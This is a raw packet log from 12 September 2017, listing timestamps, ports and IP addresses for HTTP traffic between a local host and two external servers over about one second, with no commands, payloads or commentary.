Sep 12, 2017 22:18:52.409903049 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.410250902 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.413825989 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.413857937 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.413877010 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.414088964 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.495034933 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.495059013 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.495075941 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.495095015 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.495309114 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.495338917 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.509592056 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.509639025 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.509653091 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.509818077 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.511595964 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.511754990 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.526002884 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.526057005 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.526070118 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.526437044 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.527055979 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.527081966 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.527095079 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.527282953 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.541477919 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.541743994 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.542604923 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.542620897 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.542627096 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.542826891 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.543113947 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.543127060 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.543133020 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.543236971 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.557626963 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.557719946 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.558969975 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.558984995 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.558990955 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.559120893 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.573297977 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.573318005 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.573328018 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.573455095 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.590034962 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.590065956 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.590076923 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.590276003 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.592509985 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:52.605930090 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.605981112 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.605998993 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.606012106 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.606302977 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.606362104 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.606389046 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.606662035 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.606694937 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.606859922 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.606897116 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.607481003 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.622720957 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.622767925 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.622781992 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.623032093 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.638139009 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.638164043 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.638175011 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.638384104 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.654062986 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.654124975 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.654145002 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.654161930 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.654427052 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.654486895 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:52.669881105 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.687184095 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.687222004 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.687429905 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:52.687482119 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.701766968 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.701805115 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.702029943 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:52.702075958 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.702505112 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.702523947 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.702723026 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:52.702756882 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.734997988 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.735050917 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.735064030 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.735079050 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.735295057 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:52.735327005 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.735368013 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.765786886 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.765979052 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.766634941 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.766659975 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.766673088 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.766757011 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.781593084 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.781624079 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.781645060 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.781851053 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.797564030 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.797602892 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.797614098 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.797872066 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.814337015 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.814364910 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.814373970 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.814380884 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.814604998 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.814644098 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.862111092 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.862306118 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.878534079 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.878566980 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.878573895 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.878670931 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.878767014 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.878813028 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.879276037 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.879461050 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.879478931 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.879484892 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.880598068 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:52.880634069 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.886197090 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.886231899 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.894328117 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.894360065 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.894484997 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:52.894510031 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.926430941 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.926475048 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.926489115 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.926646948 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:52.926676989 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.941925049 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.941960096 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.941981077 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.942328930 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:52.942384958 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.942447901 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.942509890 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.942538023 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.942568064 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.943080902 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.957396984 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.957840919 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.974947929 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.974993944 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.975003004 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.975260019 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.975311041 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.975366116 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.975380898 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.976573944 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.005768061 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.005814075 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.005820990 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.006072998 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.021661997 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.021703959 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.021712065 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.021821976 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.021856070 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.022458076 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.022490978 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.022618055 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.022646904 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.070534945 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.070573092 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.070684910 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.070688009 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.070705891 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.070727110 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.070745945 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.070909023 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.070928097 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.071515083 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.071542025 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.071557045 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.071996927 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.093700886 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.094037056 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.112068892 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.112102032 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.112109900 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.112452984 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.134877920 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.135090113 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.143884897 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.143894911 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.143901110 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.144560099 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.149928093 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.149972916 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.149981022 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.149996996 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.150415897 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.182116985 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.182153940 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.182296991 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.182331085 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.215037107 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.215070963 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.215483904 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.215509892 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.217000961 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.217021942 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.217216015 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.217230082 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.217247963 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.217847109 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.217871904 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.218055964 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.218077898 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.232180119 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.232213020 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.232220888 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.232383966 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.253632069 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.253690004 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.253698111 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.254251957 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.254277945 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.255188942 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.271226883 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.271253109 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.271260023 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.271750927 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.272063017 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.272080898 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.272088051 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.272170067 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.272945881 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.272969961 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.272977114 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.273341894 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.273369074 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.312849045 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.312880993 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.312891960 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.313060999 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.313097000 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.342170954 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.342215061 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.342513084 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.342547894 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.344358921 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.344381094 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.344397068 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.344700098 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.344717979 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.344722033 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.344750881 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.344796896 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.344811916 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.345218897 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.366702080 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.367023945 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.368282080 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.368305922 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.368314028 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.368551970 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.373501062 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.373785019 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.381834984 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.381863117 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.381875038 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.382224083 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.382597923 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.382620096 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.382632017 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.382739067 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.382850885 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.382870913 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.382880926 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.383161068 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.383186102 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.415265083 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.415290117 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.415298939 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.415643930 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.415669918 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.445939064 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.445971966 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.446274996 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.446314096 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.454698086 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.454729080 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.454746962 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.454974890 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.455002069 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.455030918 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.469569921 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.469592094 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.469609976 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.469799042 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.469813108 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.469829082 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.469841957 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.470217943 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.485410929 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.486608028 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.511818886 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.511856079 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.511871099 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.512126923 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.525757074 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.525794029 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.525801897 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.526092052 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.551368952 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.551403046 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.551413059 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.551821947 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.551878929 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.552633047 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.552651882 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.552787066 MESZ	49199	80	192.168.1.16	91.219.236.207
